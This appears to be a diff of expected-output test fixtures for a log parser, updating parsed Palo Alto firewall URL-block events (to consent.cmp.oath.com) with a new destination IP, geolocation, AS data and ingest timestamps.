16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691658700Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -351,26 +355,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -386,14 +392,14 @@ "port": 52986, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -408,7 +414,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:c4Xs8aAPhIYB760P+BLmrzOvjv4=" + "community_id": "1:0uWo9yvlQoQKNnEvuve6Og1LTxk=" } }, "threat_category": "unknown", @@ -453,8 +459,8 @@ ], "network": { "community_id": [ - "1:cl1ZW9fCG1bKgQuAww26hYqxyq0=", - "1:c4Xs8aAPhIYB760P+BLmrzOvjv4=" + "1:VzBhECk0ydTWchIzZpKC75545WM=", + "1:0uWo9yvlQoQKNnEvuve6Og1LTxk=" ], "transport": "tcp", "application": "ssl", @@ -493,14 +499,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767689263Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691665300Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -523,26 +529,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -558,14 +566,14 @@ "port": 52985, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -580,7 +588,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:RU/nMZByVkBbsckJ18XtpXhQlPg=" + "community_id": "1:PvQSfe6nzZWVw+NrYwRxCMRMvL0=" } }, "threat_category": "unknown", @@ -625,8 +633,8 @@ ], "network": { "community_id": [ - "1:0KdQcz2+OQg8Kuyqn3tvtzrtAtk=", - "1:RU/nMZByVkBbsckJ18XtpXhQlPg=" + "1:R7n4UdRm/gUAlGQlL7Fpccn5owY=", + "1:PvQSfe6nzZWVw+NrYwRxCMRMvL0=" ], "transport": "tcp", "application": "ssl", @@ -665,14 +673,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767693410Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691671600Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -695,26 +703,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -730,14 +740,14 @@ "port": 52987, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -752,7 +762,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:FTVZK5v5Nqts17X+FJm/bQk1rwM=" + "community_id": "1:qwbEFCglv9cpTPGD4hiS0M8uutY=" } }, "threat_category": "unknown", @@ -797,8 +807,8 @@ ], "network": { "community_id": [ - "1:ZuULYSnnlQSsdqWsfJBHQTPqbJo=", - "1:FTVZK5v5Nqts17X+FJm/bQk1rwM=" + "1:WRRynQ1xM6mmxdkOiP+40arIlVQ=", + "1:qwbEFCglv9cpTPGD4hiS0M8uutY=" ], "transport": "tcp", "application": "ssl", @@ -837,14 +847,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767697438Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691678200Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -867,26 +877,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -902,14 +914,14 @@ "port": 52988, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -924,7 +936,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:iHTY/vpQo2TsRYJW2n+lqb0w5f4=" + "community_id": "1:Pmpf6LjOLh0SyYirl1k3hFePosA=" } }, "threat_category": "unknown", @@ -969,8 +981,8 @@ ], "network": { "community_id": [ - "1:ovf/7i/MclKhY1UKalpHzmmlthk=", - "1:iHTY/vpQo2TsRYJW2n+lqb0w5f4=" + "1:V/JAeqw0ooQcQ73chBLN48vTs7M=", + "1:Pmpf6LjOLh0SyYirl1k3hFePosA=" ], "transport": "tcp", "application": "ssl", @@ -1009,14 +1021,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767701435Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691684500Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1039,26 +1051,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1074,14 +1088,14 @@ "port": 52990, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -1096,7 +1110,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:f+u5A73xp5gqmRCSN2kCCSbvBRg=" + "community_id": "1:/nHP4plhDk6B4HwFao1CPZ5FSmI=" } }, "threat_category": "unknown", @@ -1141,8 +1155,8 @@ ], "network": { "community_id": [ - "1:K7vLQF60EynWhcmrB6/wjEG8qzI=", - "1:f+u5A73xp5gqmRCSN2kCCSbvBRg=" + "1:+4smeVKey0fUOGrgXKINWjKWl+Y=", + "1:/nHP4plhDk6B4HwFao1CPZ5FSmI=" ], "transport": "tcp", "application": "ssl", @@ -1181,14 +1195,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767705323Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691690800Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1211,26 +1225,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1246,14 +1262,14 @@ "port": 52989, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
@@ -1268,7 +1284,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:v4+MIeqiGJJ9Z3SUTNLFEoYtw74=" + "community_id": "1:b1Z/qQxxzC/dejxbXLBPycQhfw0=" } }, "threat_category": "unknown", @@ -1313,8 +1329,8 @@ ], "network": { "community_id": [ - "1:nMc/XZ2HhyrMMpTfW7UK0Q7QRJM=", - "1:v4+MIeqiGJJ9Z3SUTNLFEoYtw74=" + "1:cSrUZA67JbK4AnelUwSO7ZbtWqw=", + "1:b1Z/qQxxzC/dejxbXLBPycQhfw0=" ], "transport": "tcp", "application": "ssl", @@ -1353,14 +1369,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.767739835Z", - "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691697200Z", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", "kind": "alert", 
@@ -1383,26 +1399,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -1418,14 +1436,14 @@ "port": 52992, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, 
